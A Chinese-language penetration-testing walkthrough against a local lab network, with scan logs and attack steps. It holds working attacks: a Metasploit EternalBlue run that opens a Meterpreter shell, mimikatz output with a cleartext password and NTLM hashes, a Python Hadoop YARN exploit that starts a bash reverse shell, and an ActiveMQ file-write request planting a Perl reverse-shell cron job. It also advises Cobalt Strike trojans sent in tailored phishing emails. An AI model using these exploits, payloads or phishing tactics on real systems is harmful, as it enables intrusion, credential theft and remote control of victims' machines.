00:1C:42:F4:4F:FE (Parallels)
Read data files from: /usr/local/bin/../share/nmapNmap done: 1 IP address (1 host up) scanned in 41.79 seconds Raw packets sent: 69291 (3.049MB) | Rcvd: 65536 (2.621MB)

經過端口開放狀況可判斷該主機爲Windows操做系統，查看主機操做系統版本

(base) ➜ ~ sudo nmap -O 10.211.55.5Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 19:40 CSTNmap scan report for windows-10.shared (10.211.55.5)Host is up (0.00022s latency).Not shown: 997 closed portsPORT STATE SERVICE135/tcp open msrpc139/tcp open netbios-ssn445/tcp open microsoft-dsMAC Address: 00:1C:42:F4:4F:FE (Parallels)Device type: general purposeRunning (JUST GUESSING): Microsoft Windows Longhorn|10|2008|7|Vista|8.1 (94%)OS CPE: cpe:/o:microsoft:windows cpe:/o:microsoft:windows_10:1703 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_8.1Aggressive OS guesses: Microsoft Windows Longhorn (94%), Microsoft Windows 10 1703 (92%), Microsoft Windows 10 1511 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 SP2 (91%), Microsoft Windows 7 SP1 (91%), Microsoft Windows 8.1 Update 1 (91%), Microsoft Windows 8 (91%), Microsoft Windows 10 1607 (91%), Microsoft Windows Vista SP1 (90%)No exact OS matches for host (test conditions non-ideal).Network Distance: 1 hop
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 5.43 seconds

10.211.55.6

端口掃描

(base) ➜ ~ sudo nmap -sS -p 1-65535 -v 10.211.55.6Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 19:41 CSTInitiating ARP Ping Scan at 19:41Scanning 10.211.55.6 [1 port]Completed ARP Ping Scan at 19:41, 0.00s elapsed (1 total hosts)Initiating SYN Stealth Scan at 19:41Scanning ubuntu-linux20.04.shared (10.211.55.6) [65535 ports]Discovered open port 22/tcp on 10.211.55.6Discovered open port 61616/tcp on 10.211.55.6Discovered open port 8161/tcp on 10.211.55.6Discovered open port 8088/tcp on 10.211.55.6Completed SYN Stealth Scan at 19:41, 0.55s elapsed (65535 total ports)Nmap scan report for ubuntu-linux20.04.shared (10.211.55.6)Host is up (0.000046s latency).Not shown: 65531 closed portsPORT STATE SERVICE22/tcp open ssh8088/tcp open radan-http8161/tcp open patrol-snmp61616/tcp open unknownMAC Address: 00:1C:42:B7:60:2B (Parallels)
Read data files from: /usr/local/bin/../share/nmapNmap done: 1 IP address (1 host up) scanned in 0.61 seconds Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)

操做系統識別

(base) ➜ ~ sudo nmap -O 10.211.55.6 Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 19:42 CSTNmap scan report for ubuntu-linux20.04.shared (10.211.55.6)Host is up (0.00019s latency).Not shown: 998 closed portsPORT STATE SERVICE22/tcp open ssh8088/tcp open radan-httpMAC Address: 00:1C:42:B7:60:2B (Parallels)No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).TCP/IP fingerprint:OS:SCAN(V=7.80%E=4%D=8/8%OT=22%CT=1%CU=37942%PV=Y%DS=1%DC=D%G=Y%M=001C42%TMOS:=5F2E8FA2%P=x86_64-apple-darwin19.0.0)SEQ(SP=101%GCD=1%ISR=10D%TI=Z%CI=ZOS:%II=I%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11OS:NW7%O5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FEOS:88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=4OS:0%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%OOS:=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40OS:%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%QOS:=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=YOS:%DFI=N%T=40%CD=S)
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 12.23 seconds

10.211.55.8

端口掃描

(base) ➜ ~ sudo nmap -sS -p 1-65535 -v 10.211.55.8Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 19:43 CSTInitiating ARP Ping Scan at 19:43Scanning 10.211.55.8 [1 port]Completed ARP Ping Scan at 19:43, 0.00s elapsed (1 total hosts)Initiating SYN Stealth Scan at 19:43Scanning windows-7sp1.shared (10.211.55.8) [65535 ports]Discovered open port 445/tcp on 10.211.55.8Discovered open port 135/tcp on 10.211.55.8Discovered open port 139/tcp on 10.211.55.8Discovered open port 49157/tcp on 10.211.55.8Discovered open port 49156/tcp on 10.211.55.8Discovered open port 49153/tcp on 10.211.55.8Discovered open port 49155/tcp on 10.211.55.8Discovered open port 49154/tcp on 10.211.55.8Discovered open port 49152/tcp on 10.211.55.8Completed SYN Stealth Scan at 19:44, 40.56s elapsed (65535 total ports)Nmap scan report for windows-7sp1.shared (10.211.55.8)Host is up (0.00010s latency).Not shown: 65526 closed portsPORT STATE SERVICE135/tcp open msrpc139/tcp open netbios-ssn445/tcp open microsoft-ds49152/tcp open unknown49153/tcp open unknown49154/tcp open unknown49155/tcp open unknown49156/tcp open unknown49157/tcp open unknownMAC Address: 00:1C:42:B2:9C:23 (Parallels)
Read data files from: /usr/local/bin/../share/nmapNmap done: 1 IP address (1 host up) scanned in 40.63 seconds Raw packets sent: 69424 (3.055MB) | Rcvd: 65537 (2.622MB)

操做系統識別

sudo nmap -O 10.211.55.8 Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 19:44 CSTNmap scan report for windows-7sp1.shared (10.211.55.8)Host is up (0.00017s latency).Not shown: 991 closed portsPORT STATE SERVICE135/tcp open msrpc139/tcp open netbios-ssn445/tcp open microsoft-ds49152/tcp open unknown49153/tcp open unknown49154/tcp open unknown49155/tcp open unknown49156/tcp open unknown49157/tcp open unknownMAC Address: 00:1C:42:B2:9C:23 (Parallels)Device type: general purposeRunning: Microsoft Windows 7|2008|8.1OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1Network Distance: 1 hop
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 2.78 seconds

Goby

由於Goby掃描發包速率設置最大，運行會斷網，影響網絡使用，不作展現，僅做示意操做。

收集客戶公司信息

企查查

www.qichacha.com

門戶網站

在這個場景下假設咱們收集到了客戶公司的郵箱。

漏洞利用

通過前期信息收集，可得出如下判斷

10.211.55.5和10.211.55.8均爲Windows操做系統。

Windows操做系統開放了

10.211.55.5PORT STATE SERVICE135/tcp open msrpc139/tcp open netbios-ssn445/tcp open microsoft-ds5040/tcp open unknown49664/tcp open unknown49665/tcp open unknown49666/tcp open unknown49667/tcp open unknown49668/tcp open unknown49669/tcp open unknown49671/tcp open unknown
10.211.55.8PORT STATE SERVICE135/tcp open msrpc139/tcp open netbios-ssn445/tcp open microsoft-ds49152/tcp open unknown49153/tcp open unknown49154/tcp open unknown49155/tcp open unknown49156/tcp open unknown49157/tcp open unknown

在作滲透測試的時候，一個shell對話只作一類事，端口掃描的shell不要用來作漏洞檢測和利用。方便把日誌導出爲文本交給客戶。

根據開放的445端口可初步肯定存在MS17-010永恆之藍漏洞

對漏洞進行驗證和利用，使用Metasploit裏對payload進行驗證。

通過驗證，10.211.55.5不存在ms17-010漏洞

通過驗證，10.211.55.8存在ms17-010漏洞，使用exploit進行攻擊。

msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 10.211.55.8rhosts => 10.211.55.8msf5 exploit(windows/smb/ms17_010_eternalblue) > set rport 445rport => 445msf5 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 192.168.1.2:4444 [*] 10.211.55.8:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check[+] 10.211.55.8:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)[*] 10.211.55.8:445 - Scanned 1 of 1 hosts (100% complete)[*] 10.211.55.8:445 - Connecting to target for exploitation.[+] 10.211.55.8:445 - Connection established for exploitation.[+] 10.211.55.8:445 - Target OS selected valid for OS indicated by SMB reply[*] 10.211.55.8:445 - CORE raw buffer dump (38 bytes)[*] 10.211.55.8:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima[*] 10.211.55.8:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service [*] 10.211.55.8:445 - 0x00000020 50 61 63 6b 20 31 Pack 1 [+] 10.211.55.8:445 - Target arch selected valid for arch indicated by DCE/RPC reply[*] 10.211.55.8:445 - Trying exploit with 12 Groom Allocations.[*] 10.211.55.8:445 - Sending all but last fragment of exploit packet[*] 10.211.55.8:445 - Starting non-paged pool grooming[+] 10.211.55.8:445 - Sending SMBv2 buffers[+] 10.211.55.8:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.[*] 10.211.55.8:445 - Sending final SMBv2 buffers.[*] 10.211.55.8:445 - Sending last fragment of exploit packet![*] 10.211.55.8:445 - Receiving response from exploit packet[+] 10.211.55.8:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)![*] 10.211.55.8:445 - Sending egg to corrupted connection.[*] 10.211.55.8:445 - Triggering free of corrupted buffer.[*] Sending stage (201283 bytes) to 192.168.1.2[*] Meterpreter session 1 opened (192.168.1.2:4444 -> 192.168.1.2:49249) at 2020-08-08 20:00:18 +0800[+] 10.211.55.8:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=[+] 10.211.55.8:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=[+] 10.211.55.8:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter >

抓取目標主機的帳號登陸密碼：

C:\Windows\system32>ipconfig ipconfig
Windows IP Configuration

Ethernet adapter ???????? 2:
 Connection-specific DNS Suffix . : localdomain IPv6 Address. . . . . . . . . . . : fdb2:2c26:f4e4:0:7002:eaf9:c043:7b1b Temporary IPv6 Address. . . . . . : fdb2:2c26:f4e4:0:cde9:7d52:8c02:9037 Link-local IPv6 Address . . . . . : fe80::7002:eaf9:c043:7b1b%14 IPv4 Address. . . . . . . . . . . : 10.211.55.8 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : fe80::21c:42ff:fe00:18%14 10.211.55.1
Tunnel adapter isatap.localdomain:
 Media State . . . . . . . . . . . : Media disconnected Connection-specific DNS Suffix . : localdomain

C:\Windows\system32>systeminfosysteminfo
Host Name: RETURN0FA54OS Name: Microsoft Windows 7 Ultimate OS Version: 6.1.7601 Service Pack 1 Build 7601OS Manufacturer: Microsoft CorporationOS Configuration: Standalone WorkstationOS Build Type: Multiprocessor FreeRegistered Owner: return0;Registered Organization: Product ID: 00426-384-1216344-06000Original Install Date: 2020/7/13, 1:45:07System Boot Time: 2020/8/8, 14:45:29System Manufacturer: Parallels Software International Inc.System Model: Parallels Virtual PlatformSystem Type: x64-based PCProcessor(s): 1 Processor(s) Installed. [01]: Intel64 Family 6 Model 158 Stepping 13 GenuineIntel ~2400 MhzBIOS Version: Parallels Software International Inc. 15.1.4 (47270), 2020/4/13Windows Directory: C:\WindowsSystem Directory: C:\Windows\system32Boot Device: \Device\HarddiskVolume1System Locale: zh-cn;Chinese (China)Input Locale: en-us;English (United States)Time Zone: N/ATotal Physical Memory: 4,096 MBAvailable Physical Memory: 3,313 MBVirtual Memory: Max Size: 8,189 MBVirtual Memory: Available: 7,308 MBVirtual Memory: In Use: 881 MBPage File Location(s): C:\pagefile.sysDomain: WORKGROUPLogon Server: N/AHotfix(s): 2 Hotfix(s) Installed. [01]: KB2534111 [02]: KB976902Network Card(s): 1 NIC(s) Installed. [01]: Parallels Ethernet Adapter Connection Name: 本地鏈接 2 DHCP Enabled: Yes DHCP Server: 10.211.55.1 IP address(es) [01]: 10.211.55.8 [02]: fe80::7002:eaf9:c043:7b1b [03]: fdb2:2c26:f4e4:0:cde9:7d52:8c02:9037 [04]: fdb2:2c26:f4e4:0:7002:eaf9:c043:7b1b

通過對目標主機信息收集，發現目標主機系統爲64位，上傳64位mimikatz.exe進行密碼抓取。

mimikatz # sekurlsa::logonPasswords
Authentication Id : 0 ; 73647 (00000000:00011faf)Session : Interactive from 1User Name : return0Domain : RETURN0FA54Logon Server : RETURN0FA54Logon Time : 2020/8/8 14:45:41SID : S-1-5-21-2676871807-2807053931-1165176819-1000 msv :  [00000003] Primary * Username : return0 * Domain : RETURN0FA54 * LM : b47f9a39939fbe2e3cfeb463bfee415c * NTLM : 52dec73c7fb089d8917fbdf7985b6036 * SHA1 : f072ae3248a49934bd3d472cdf8ffcaffa74f7bf tspkg :  * Username : return0 * Domain : RETURN0FA54 * Password : woshidashabi! wdigest :  * Username : return0 * Domain : RETURN0FA54 * Password : woshidashabi! kerberos :  * Username : return0 * Domain : RETURN0FA54 * Password : woshidashabi! ssp :  credman : 
Authentication Id : 0 ; 73594 (00000000:00011f7a)Session : Interactive from 1User Name : return0Domain : RETURN0FA54Logon Server : RETURN0FA54Logon Time : 2020/8/8 14:45:41SID : S-1-5-21-2676871807-2807053931-1165176819-1000 msv :  [00000003] Primary * Username : return0 * Domain : RETURN0FA54 * LM : b47f9a39939fbe2e3cfeb463bfee415c * NTLM : 52dec73c7fb089d8917fbdf7985b6036 * SHA1 : f072ae3248a49934bd3d472cdf8ffcaffa74f7bf tspkg :  * Username : return0 * Domain : RETURN0FA54 * Password : woshidashabi! wdigest :  * Username : return0 * Domain : RETURN0FA54 * Password : woshidashabi! kerberos :  * Username : return0 * Domain : RETURN0FA54 * Password : woshidashabi! ssp :  credman : 
Authentication Id : 0 ; 997 (00000000:000003e5)Session : Service from 0User Name : LOCAL SERVICEDomain : NT AUTHORITYLogon Server : (null)Logon Time : 2020/8/8 14:45:40SID : S-1-5-19 msv :  tspkg :  wdigest :  * Username : (null) * Domain : (null) * Password : (null) kerberos :  * Username : (null) * Domain : (null) * Password : (null) ssp :  credman : 
Authentication Id : 0 ; 996 (00000000:000003e4)Session : Service from 0User Name : RETURN0FA54$Domain : WORKGROUPLogon Server : (null)Logon Time : 2020/8/8 14:45:40SID : S-1-5-20 msv :  tspkg :  wdigest :  * Username : RETURN0FA54$ * Domain : WORKGROUP * Password : (null) kerberos :  * Username : return0fa54$ * Domain : WORKGROUP * Password : (null) ssp :  credman : 
Authentication Id : 0 ; 30280 (00000000:00007648)Session : UndefinedLogonType from 0User Name : (null)Domain : (null)Logon Server : (null)Logon Time : 2020/8/8 14:45:39SID :  msv :  tspkg :  wdigest :  kerberos :  ssp :  credman : 
Authentication Id : 0 ; 999 (00000000:000003e7)Session : UndefinedLogonType from 0User Name : RETURN0FA54$Domain : WORKGROUPLogon Server : (null)Logon Time : 2020/8/8 14:45:39SID : S-1-5-18 msv :  tspkg :  wdigest :  * Username : RETURN0FA54$ * Domain : WORKGROUP * Password : (null) kerberos :  * Username : return0fa54$ * Domain : WORKGROUP * Password : (null) ssp :  credman :

前期信息收集發現3389端口沒開，沒法進行登陸操做，使用命令進行3389端口開放操做。

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

咱們使用Nmap再次進行端口探測，可發現3389端口成功開啓。

(base) ➜ ~ sudo nmap -O 10.211.55.8Password:Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 20:13 CSTNmap scan report for windows-7sp1.shared (10.211.55.8)Host is up (0.00018s latency).Not shown: 990 closed portsPORT STATE SERVICE135/tcp open msrpc139/tcp open netbios-ssn445/tcp open microsoft-ds3389/tcp open ms-wbt-server49152/tcp open unknown49153/tcp open unknown49154/tcp open unknown49155/tcp open unknown49156/tcp open unknown49157/tcp open unknownMAC Address: 00:1C:42:B2:9C:23 (Parallels)Device type: general purposeRunning: Microsoft Windows 7|2008|8.1OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1Network Distance: 1 hop
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 2.91 seconds

3389端口開啓成功以後利用抓取到的密碼進行遠程登陸操做。

成功登陸Windows7SP1操做系統。

10.211.55.6爲Ubuntu Linux

開放的端口爲：

PORT STATE SERVICE22/tcp open ssh8088/tcp open radan-http8161/tcp open patrol-snmp61616/tcp open unknown

開放8088端口，Web應用，使用瀏覽器打開發現Hadoop未受權訪問。

能夠利用Hadoop未受權訪問獲取服務器權限。

反彈shell的exploit

# _*_ coding utf-8 _*_# author:return0;import requests
target = 'http://10.211.55.6:8088/' # 目標主機的IP地址lhost = '192.168.1.2' # 攻擊機物理地址，監聽端口是8888
url = target + 'ws/v1/cluster/apps/new-application'resp = requests.post(url)app_id = resp.json()['application-id']url = target + 'ws/v1/cluster/apps'data = { 'application-id': app_id, 'application-name': 'get-shell', 'am-container-spec': { 'commands': { 'command': '/bin/bash -i >& /dev/tcp/%s/8888 0>&1' % lhost, }, }, 'application-type': 'YARN',}requests.post(url, json=data)

監聽8888端口

(base) ➜ ~ nc -l 8888bash: cannot set terminal process group (211): Inappropriate ioctl for devicebash: no job control in this shell<33412_0001/container_1596872533412_0001_01_000001# whoamiwhoamiroot<33412_0001/container_1596872533412_0001_01_000001# ifconfigifconfigeth0 Link encap:Ethernet HWaddr 02:42:ac:1a:00:02  inet addr:172.26.0.2 Bcast:172.26.255.255 Mask:255.255.0.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:17365 errors:0 dropped:0 overruns:0 frame:0 TX packets:34456 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0  RX bytes:1858357 (1.7 MiB) TX bytes:5760591 (5.4 MiB)
lo Link encap:Local Loopback  inet addr:127.0.0.1 Mask:255.0.0.0 UP LOOPBACK RUNNING MTU:65536 Metric:1 RX packets:8 errors:0 dropped:0 overruns:0 frame:0 TX packets:8 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000  RX bytes:647 (647.0 B) TX bytes:647 (647.0 B)
<33412_0001/container_1596872533412_0001_01_000001# ididuid=0(root) gid=0(root) groups=0(root)<33412_0001/container_1596872533412_0001_01_000001#

獲取到Ubuntu Linux服務器權限

主機開放了8161端口，使用瀏覽器打開發現爲ActiveMQ組件，存在任意文件寫入漏洞。

PUT /fileserver/1.txt HTTP/1.1Host: 10.211.55.6:8161Accept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Length: 249
*/1 * * * * root /usr/bin/perl -e 'use Socket;$i="192.168.1.2";$p=21;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'##

使用BurpSuite對網頁數據進行抓包，改動數據包寫馬重放數據包，204表示成功。

將上傳的馬進行文件移動操做

MOVE /fileserver/1.txt HTTP/1.1 Destination: file:///etc/cron.d/root/1.txt Host: 10.211.55.6:8161 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Length: 6
test

監聽端口等待shell反彈便可。

針對Windows10須要使用CobaltStrike生成木馬進行社工操做誘惑用戶點擊木馬。

啓動CobaltStrike服務器端

啓動客戶端

對生成對木馬進行假裝，對客戶發送釣魚郵件。

釣魚郵件主題：要貼合客戶業務範圍，別瞎發驢脣不對馬嘴。人家是能源業務，你發個電網業務相關郵件，是不會打開的。對生成的馬要作免殺操做，免殺下次講。

權限提高

滲透測試日誌

端口掃描

Last login: Sat Aug 8 18:51:00 on ttys001(base) ➜ ~ Nmap -Pn 10.211.55.1/24Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 19:26 CSTNmap scan report for 10.211.55.0Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.0 are filtered
Nmap scan report for 10.211.55.1Host is up.All 1000 scanned ports on 10.211.55.1 are filtered
Nmap scan report for 10.211.55.2Host is up (0.0013s latency).All 1000 scanned ports on 10.211.55.2 are closed
Nmap scan report for 10.211.55.3Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.3 are filtered
Nmap scan report for 10.211.55.4Host is up (0.000025s latency).All 1000 scanned ports on 10.211.55.4 are filtered
Nmap scan report for windows-10.shared (10.211.55.5)Host is up (0.00068s latency).Not shown: 997 filtered portsPORT STATE SERVICE135/tcp open msrpc139/tcp open netbios-ssn445/tcp open microsoft-ds
Nmap scan report for ubuntu-linux20.04.shared (10.211.55.6)Host is up (0.00085s latency).Not shown: 998 filtered portsPORT STATE SERVICE22/tcp open ssh8088/tcp open radan-http
Nmap scan report for 10.211.55.7Host is up (0.000018s latency).All 1000 scanned ports on 10.211.55.7 are filtered
Nmap scan report for windows-7sp1.shared (10.211.55.8)Host is up (0.0011s latency).Not shown: 991 filtered portsPORT STATE SERVICE135/tcp open msrpc139/tcp open netbios-ssn445/tcp open microsoft-ds49152/tcp open unknown49153/tcp open unknown49154/tcp open unknown49155/tcp open unknown49156/tcp open unknown49157/tcp open unknown
Nmap scan report for 10.211.55.9Host is up (0.000018s latency).All 1000 scanned ports on 10.211.55.9 are filtered
Nmap scan report for 10.211.55.10Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.10 are filtered
Nmap scan report for 10.211.55.11Host is up (0.000026s latency).All 1000 scanned ports on 10.211.55.11 are filtered
Nmap scan report for 10.211.55.12Host is up (0.000029s latency).All 1000 scanned ports on 10.211.55.12 are filtered
Nmap scan report for 10.211.55.13Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.13 are filtered
Nmap scan report for 10.211.55.14Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.14 are filtered
Nmap scan report for 10.211.55.15Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.15 are filtered
Nmap scan report for 10.211.55.16Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.16 are filtered
Nmap scan report for 10.211.55.17Host is up (0.000027s latency).All 1000 scanned ports on 10.211.55.17 are filtered
Nmap scan report for 10.211.55.18Host is up (0.000027s latency).All 1000 scanned ports on 10.211.55.18 are filtered
Nmap scan report for 10.211.55.19Host is up (0.000018s latency).All 1000 scanned ports on 10.211.55.19 are filtered
Nmap scan report for 10.211.55.20Host is up (0.000018s latency).All 1000 scanned ports on 10.211.55.20 are filtered
Nmap scan report for 10.211.55.21Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.21 are filtered
Nmap scan report for 10.211.55.22Host is up (0.000017s latency).All 1000 scanned ports on 10.211.55.22 are filtered
Nmap scan report for 10.211.55.23Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.23 are filtered
Nmap scan report for 10.211.55.24Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.24 are filtered
Nmap scan report for 10.211.55.25Host is up (0.000019s latency).All 1000 scanned ports on 10.211.55.25 are filtered
Nmap scan report for 10.211.55.26Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.26 are filtered
Nmap scan report for 10.211.55.27Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.27 are filtered
Nmap scan report for 10.211.55.28Host is up (0.000018s latency).All 1000 scanned ports on 10.211.55.28 are filtered
Nmap scan report for 10.211.55.29Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.29 are filtered
Nmap scan report for 10.211.55.30Host is up (0.000018s latency).All 1000 scanned ports on 10.211.55.30 are filtered
Nmap scan report for 10.211.55.31Host is up (0.000018s latency).All 1000 scanned ports on 10.211.55.31 are filtered
Nmap scan report for 10.211.55.32Host is up (0.000018s latency).All 1000 scanned ports on 10.211.55.32 are filtered
Nmap scan report for 10.211.55.33Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.33 are filtered
Nmap scan report for 10.211.55.34Host is up (0.000017s latency).All 1000 scanned ports on 10.211.55.34 are filtered
Nmap scan report for 10.211.55.35Host is up (0.000019s latency).All 1000 scanned ports on 10.211.55.35 are filtered
Nmap scan report for 10.211.55.36Host is up (0.000018s latency).All 1000 scanned ports on 10.211.55.36 are filtered
Nmap scan report for 10.211.55.37Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.37 are filtered
Nmap scan report for 10.211.55.38Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.38 are filtered
Nmap scan report for 10.211.55.39Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.39 are filtered
Nmap scan report for 10.211.55.40Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.40 are filtered
Nmap scan report for 10.211.55.41Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.41 are filtered
Nmap scan report for 10.211.55.42Host is up (0.000017s latency).All 1000 scanned ports on 10.211.55.42 are filtered
Nmap scan report for 10.211.55.43Host is up (0.000018s latency).All 1000 scanned ports on 10.211.55.43 are filtered
Nmap scan report for 10.211.55.44Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.44 are filtered
Nmap scan report for 10.211.55.45Host is up (0.000025s latency).All 1000 scanned ports on 10.211.55.45 are filtered
Nmap scan report for 10.211.55.46Host is up (0.000017s latency).All 1000 scanned ports on 10.211.55.46 are filtered
Nmap scan report for 10.211.55.47Host is up (0.000035s latency).All 1000 scanned ports on 10.211.55.47 are filtered
Nmap scan report for 10.211.55.48Host is up (0.000029s latency).All 1000 scanned ports on 10.211.55.48 are filtered
Nmap scan report for 10.211.55.49Host is up (0.000025s latency).All 1000 scanned ports on 10.211.55.49 are filtered
Nmap scan report for 10.211.55.50Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.50 are filtered
Nmap scan report for 10.211.55.51Host is up (0.000025s latency).All 1000 scanned ports on 10.211.55.51 are filtered
Nmap scan report for 10.211.55.52Host is up (0.000016s latency).All 1000 scanned ports on 10.211.55.52 are filtered
Nmap scan report for 10.211.55.53Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.53 are filtered
Nmap scan report for 10.211.55.54Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.54 are filtered
Nmap scan report for 10.211.55.55Host is up (0.000018s latency).All 1000 scanned ports on 10.211.55.55 are filtered
Nmap scan report for 10.211.55.56Host is up (0.000017s latency).All 1000 scanned ports on 10.211.55.56 are filtered
Nmap scan report for 10.211.55.57Host is up (0.000028s latency).All 1000 scanned ports on 10.211.55.57 are filtered
Nmap scan report for 10.211.55.58Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.58 are filtered
Nmap scan report for 10.211.55.59Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.59 are filtered
Nmap scan report for 10.211.55.60Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.60 are filtered
Nmap scan report for 10.211.55.61Host is up (0.000035s latency).All 1000 scanned ports on 10.211.55.61 are filtered
Nmap scan report for 10.211.55.62Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.62 are filtered
Nmap scan report for 10.211.55.63Host is up (0.000026s latency).All 1000 scanned ports on 10.211.55.63 are filtered
Nmap scan report for 10.211.55.64Host is up (0.000025s latency).All 1000 scanned ports on 10.211.55.64 are filtered
Nmap scan report for 10.211.55.65Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.65 are filtered
Nmap scan report for 10.211.55.66Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.66 are filtered
Nmap scan report for 10.211.55.67Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.67 are filtered
Nmap scan report for 10.211.55.68Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.68 are filtered
Nmap scan report for 10.211.55.69Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.69 are filtered
Nmap scan report for 10.211.55.70Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.70 are filtered
Nmap scan report for 10.211.55.71Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.71 are filtered
Nmap scan report for 10.211.55.72Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.72 are filtered
Nmap scan report for 10.211.55.73Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.73 are filtered
